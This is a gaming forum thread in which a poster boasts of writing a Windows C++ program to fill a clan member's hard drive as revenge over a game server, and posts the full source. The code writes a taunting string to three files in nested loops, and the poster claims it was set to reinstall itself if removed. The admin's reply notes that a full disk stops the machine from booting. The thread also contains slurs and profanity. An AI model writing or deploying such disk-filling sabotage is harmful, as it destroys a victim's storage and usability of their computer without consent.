Lol, some retard from our clan decided to fuck up the zombiemod he hosted for us by puttin unl ammo ^^
Jay(clan leader) asked me to do this :)
thats about 10-20 minutes of writing ^^
edit: forgot to tell that this loops untill his harddrive is full. and infected windows crap to do the same if he removes it ^^
(its currently at 13gb ea file)
Dont mess with TehKiller XD
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: Dont mess with TehKiller XD
this thing keeps making files with random data in them ?
haha when HDD is full, then it wont be bootable.
haha when HDD is full, then it wont be bootable.
Re: Dont mess with TehKiller XD
he found out when the files reached 320 gb ea, so 1 terrabyte of disk space raped ^^
not really random data(was too lazy to write random data) instead it got filled with
not really random data(was too lazy to write random data) instead it got filled with
the code I wrote in a short 2-3 min ^^:FUCK U KEKEKEKEKEKEKEKE - Revenge for fucking Zombiemod up lololol
Code: Select all
#include <windows.h>
#include <iostream>
#include <fstream>
using namespace std;
int main()
{
FILE *LOL = fopen("you.txt", "a");
FILE *KEK = fopen("suck.txt", "a");
FILE *FDF = fopen("balls.txt", "a");
for(int i = 0; i < 1000000; i++)
{
for(int j = 0; j < 1000000; j++)
{
for(int k = 0; k < 1000000; k++)
{
char buffer[67] = "FUCK U KEKEKEKEKEKEKEKE - Revenge for fucking Zombiemod up lololol";
fwrite(buffer, 1, sizeof(buffer), LOL);
fwrite(buffer, 1, sizeof(buffer), KEK);
fwrite(buffer, 1, sizeof(buffer), FDF);
}
}
}
return 0;
}